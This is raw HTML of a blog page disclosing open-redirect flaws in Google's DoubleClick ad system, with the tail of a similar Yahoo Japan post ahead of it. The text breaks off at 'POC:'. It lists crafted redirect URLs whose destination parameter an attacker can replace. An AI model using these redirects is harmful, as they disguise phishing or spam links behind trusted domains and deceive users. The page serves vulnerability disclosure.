<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry?ITRACK_INFO=087836355102152107140219030330&COOKIE_PATH=/&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http://www.inzeed.com/kaleidoscope" style="background-color: white;" target="_blank">http://order.store.yahoo.co.<wbr></wbr>jp/cgi-bin/yj-affiliate-entry?<wbr></wbr>ITRACK_INFO=<wbr></wbr>087836355102152107140219030330<wbr></wbr>&COOKIE_PATH=/&COOKIE_DOMAIN=.<wbr></wbr>yahoo.co.jp&VIEW_URL=http://<wbr></wbr>www.inzeed.com/kaleidoscope</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: white;">Poc Video:</b></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=2SM78WKAVr8&feature=youtu.be" style="background-color: white;">https://www.youtube.com/watch?v=2SM78WKAVr8&feature=youtu.be</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /><b>Blog:</b></span><br />
<a href="http://securityrelated.blogspot.com/2014/12/yahoo-yahoocojp-open-redirect-security.html"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2014/12/yahoo-yahoocojp-open-redirect-security.html</span></a></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
</span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">More Articles:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2014/Dec/88" style="background-color: white;">http://seclists.org/fulldisclosure/2014/Dec/88</a><br /><a href="http://lists.openwall.net/full-disclosure/2014/12/19/10">http://lists.openwall.net/full-disclosure/2014/12/19/10</a></span></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1355"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1355</span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://diebiyi.com/articles/security/open-redirect/yahoo-yahoo-com-yahoo-co-jp-open-redirect-unvalidated-redirects-and-forwards-web-security-bugs/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/open-redirect/yahoo-yahoo-com-yahoo-co-jp</span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://essaybeans.blogspot.com/2015/06/yahoo-yahoocom-yahoocojp-open-redirect.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://essaybeans.blogspot.com/2015/06/yahoo-yahoocom-yahoocojp-open-redirect.html</span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://webtechwire.wordpress.com/2014/12/23/yahoo-yahoo-com-yahoo-co-jp-open-redirect-unvalidated-redirects-and-forwards-web-security-bugs/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://webtechwire.wordpress.com/2014/12/23/yahoo-yahoo-com-yahoo-co-jp</span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://twitter.com/essayjeans/status/606789286428438528"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://twitter.com/essayjeans/status/606789286428438528</span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://inzeed.tumblr.com/post/118511483471/securitypost-yahoo-and-yahoo-japan-may-be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://inzeed.tumblr.com/post/118511483471/securitypost-yahoo-and-yahoo-japan-may-be</span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://essayjeans.lofter.com/post/1cc7459a_7314ba3"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://essayjeans.lofter.com/post/1cc7459a_7314ba3</span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://plus.google.com/u/0/+essayjeans/posts/GxcKENw4ira"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://plus.google.com/u/0/+essayjeans/posts/GxcKENw4ira</span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://www.weibo.com/3973471553/ClaSVxObt?from=page_1005053973471553_profile&wvr=6&mod=weibotime&type=comment"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.weibo.com/3973471553/ClaSVxObt?from=page_1005053973471553</span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://computerobsess.blogspot.com/2015/06/yahoo-yahoocom-yahoocojp-open-redirect.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://computerobsess.blogspot.com/2015/06/yahoo-yahoocom-yahoocojp-open-redirect.html</span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://www.facebook.com/permalink.php?story_fbid=841616792540365&id=767438873291491"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/permalink.php?story_fbid=841616792540365</span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://xingti.tumblr.com/post/120770694665/lifegrey-yahoo-url-redirection-bug"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://xingti.tumblr.com/post/120770694665/lifegrey-yahoo-url-redirection-bug</span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://xingzhehong.lofter.com/post/1cfd0db2_6e68fe3"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://xingzhehong.lofter.com/post/1cfd0db2_6e68fe3</span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://whitehatpost.blog.163.com/blog/static/24223205420155581240158"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://whitehatpost.blog.163.com/blog/static/24223205420155581240158</span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://www.facebook.com/websecuritiesnews/posts/803277513125754"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/websecuritiesnews/posts/803277513125754</span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://www.inzeed.com/kaleidoscope/spamming/yahoo-url-redirection/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/spamming/yahoo-url-redirection/</span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-67838918531892325112015-06-05T01:31:00.000-07:002015-06-05T01:34:16.466-07:00Google DoubleClick Website System Could be Used by Spammers<div class="">
<div class="im">
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-2q3R4IoKM74/VXFLjTkuW-I/AAAAAAAAA-g/fs8UaCoJ7KM/s1600/google_double_click.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://4.bp.blogspot.com/-2q3R4IoKM74/VXFLjTkuW-I/AAAAAAAAA-g/fs8UaCoJ7KM/s400/google_double_click.png" width="400" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">Google DoubleClick.net (Advertising) System URL Redirection Vulnerabilities Could Be Used by Spammers</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><br /></span></span>
<br />
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Although Google does not include Open Redirect vulnerabilities in its bug bounty program, its preventive measures against Open Redirect attacks have been quite thorough and effective to date.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"></span></span><br />
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"></span></span><br />
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;">However, Google might have overlooked the security of its DoubleClick.net <wbr></wbr>advertising system. After some test, it is found that most of the redirection URLs within DoubleClick.net are vulnerable to Open Redirect vulnerabilities. Many redirection are likely to be affected. </span>This could allow a user to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are useful as the crafted URL initially appear to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client side software such as a web browser or document rendering programs.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"></span></span><br />
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"></span><br />
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">These redirections can be easily used by spammers, too.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;">Some URLs belong to Googleads.g.Doubleclick.net</span><wbr></wbr><span style="font-size: small;"> are vulnerable to Open Redirect attacks, too. While Google prevents similar URL redirections other than Googleads.g.Doubleclick.<wbr></wbr>net. Attackers can use URLs related to Google Account to make the attacks more powerful.</span></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Moreover, these vulnerabilities can be used to attack other companies such as Google, eBay, The New York Times, Amazon, Godaddy, Yahoo, Netease, e.g. by bypassing their Open Redirect filters (Covert Redirect). These cyber security bug problems have not been patched. Other similar web and computer attacks will be published in the near future.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<div style="line-height: 20.7900009155273px;">
<div style="line-height: 28px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Discover and Reporter:</span></div>
</div>
<div>
<div style="padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><span style="line-height: 17.8181819915772px; text-align: justify;">Jing Wang, </span><span style="line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="text-align: justify;"><span style="line-height: 17.8181819915772px;">Singapore. (</span><a href="https://twitter.com/justqdjing/status/534330655891419136">@justqdjing</a><span style="line-height: 17.8181819915772px;">)</span></span></span><a href="http://www.tetraph.com/wangjing/" style="line-height: 28px; text-align: justify;">http://www.tetraph.com/<wbr></wbr>wangjing/</a></span></div>
</div>
<div style="line-height: 20.7900009155273px;">
<div style="line-height: 28px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="line-height: 28px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="line-height: 28px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="line-height: 28px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1) Background Related to Google DoubleClick.net.</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.1) What is DoubleClick.net?</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">"</span><span style="font-family: Arial, Helvetica, sans-serif;">DoubleClick is a subsidiary of Google which develops and provides Internet ad serving services. Its clients include agencies, marketers (Universal McCann, AKQA etc.) and publishers who serve customers like Microsoft, General Motors, Coca-Cola, Motorola, L'Oréal, Palm, Inc., Apple Inc., Visa USA, Nike, Carlsberg among others. DoubleClick's headquarters is in New York City, United States.</span></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;">DoubleClick was founded in 1996 by Kevin O'Connor and Dwight Merriman. It was formerly listed as "DCLK" on the NASDAQ, and was purchased by private equity firms Hellman & Friedman and JMI Equity in July 2005. In March 2008, Google acquired DoubleClick for US$3.1 billion. Unlike many other dot-com companies, it survived the dot-com bubble and focuses on uploading ads and reporting their performance.</span><span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">" (Wikipedia)</span></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.2) Reports Related to Google DoubleClick.net Used by Spammers</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.2.1)</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Google DoublClick.net has been used by spammers for long time. The following is a report in 2008.</span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"The open redirect had become popular with spammers trying to lure users into clicking their links, as they could be made to look like safe URLs within Google's domain."</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.virusbtn.com/blog/2008/06_03a.xml?comments" style="background-color: white;" target="_blank">https://www.virusbtn.com/blog/<wbr></wbr>2008/06_03a.xml?comments</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.2.2)</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Mitechmate published a blog related to DoubleClick.net spams in 2014.</span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"<a href="http://ad.doubleclick.net/" target="_blank">Ad.doubleclick.net</a> is recognized as a perilous adware application that causes unwanted redirections when surfing on the certain webpages. Actually it is another browser hijacker that aims to distribute frauds to make money.Commonly people pick up Ad.doubleclick virus when download softwares, browse porn site or read spam email attachments. It enters into computer sneakily after using computer insecurely.Ad.<wbr></wbr>doubleclick.net is not just annoying, this malware traces users’ personal information, which would be utilized for cyber criminal."</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://blog.mitechmate.com/remove-ad-doubleclick-net-redirect-virus/" style="background-color: white;" target="_blank">http://blog.mitechmate.com/<wbr></wbr>remove-ad-doubleclick-net-<wbr></wbr>redirect-virus/</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.2.3)</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Malwarebytes posted a news related to DoubleClick.net malvertising in 2014.</span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"Large malvertising campaign under way involving DoubleClick and Zedo"</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/" style="background-color: white;" target="_blank">https://blog.malwarebytes.org/<wbr></wbr>malvertising-2/2014/09/large-<wbr></wbr>malvertising-campaign-under-<wbr></wbr>way-involving-doubleclick-and-<wbr></wbr>zedo/</a></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2) DoubleClick.net System URL Redirection Vulnerabilities Details.</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7. </span></span><br />
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;">Used webpages for the following tests. The webpage address is "</span><a href="http://securitypost.tumblr.com/">http://securitypost.tumblr.com/</a>". We can suppose that this webpage is malicious.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.1) Vulnerable URLs Related to Googleads.g.Doubleclick.net<wbr></wbr>.</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.1.1)</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;">Some URLs belong to googleads.g.doubleclick.net</span><wbr></wbr><span style="font-size: small;"> are vulnerable to Open Redirect attacks. While Google prevents similar URL redirection other than googleads.g.doubleclick.<wbr></wbr>net.</span></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URLs:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.sharp-world.com/igzo" style="background-color: white;" target="_blank">http://googleads.g.<wbr></wbr>doubleclick.net/aclk?sa=L&ai=<wbr></wbr>CWEQH6Q73UqW9CMvMigfdiIGoB9rlk<wbr></wbr>sIEAAAQASAAUO7kr-b8_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEggFP0<wbr></wbr>E-9agyjXkIfjOxmtpPE76hNCBn1in_<wbr></wbr>meKMn53O-<wbr></wbr>8ZFlbxWDgYdaVZQKJza8mIRXw22hWI<wbr></wbr>VMAOJJzq-S6AipWHe9iVZCAAlcHj-<wbr></wbr>gT2B33tD9a2oQrZ61S3-WFh_<wbr></wbr>8T8RFUFnC_PRC35CTFbueQrUYjC-<wbr></wbr>j6ncVXzt_IPXugo5vE-3x4AQBoAYV&<wbr></wbr>num=0&sig=AOD64_<wbr></wbr>2petJH0A9Zjj45GN117ocBukiroA&<wbr></wbr>client=ca-pub-<wbr></wbr>0466582109566532&adurl=http://<wbr></wbr>www.sharp-world.com/igzo</a></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://economics.wj.com" style="background-color: white;" target="_blank">http://googleads.g.<wbr></wbr>doubleclick.net/aclk?sa=L&ai=<wbr></wbr>C-<wbr></wbr>RHnNvn2Uom8LeTaigfjkIHICfLQncc<wbr></wbr>EAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEhQFP0<wbr></wbr>LHofgVzg8U9Bvwu2_<wbr></wbr>hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6<wbr></wbr>QzMgNxx0_UawPG3-<wbr></wbr>UD097GLLCirbVMl2QxQqa04U3cp4YF<wbr></wbr>gV5dshYbzmqlVVfNn-<wbr></wbr>NuunzLNab6ATE5BUwQ9bgXBOW_<wbr></wbr>qEz8qgbwVOvUJrn1IzL-<wbr></wbr>ymANaKsQLZ9POlkbIe4AQBoAYV&<wbr></wbr>num=0&sig=AOD64_3a3m_P_<wbr></wbr>9GRVFc6UIGvnornMcLMoQ&client=<wbr></wbr>ca-pub-0466582109566532&adurl=<wbr></wbr>http://economics.wj.com</a></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
<div>
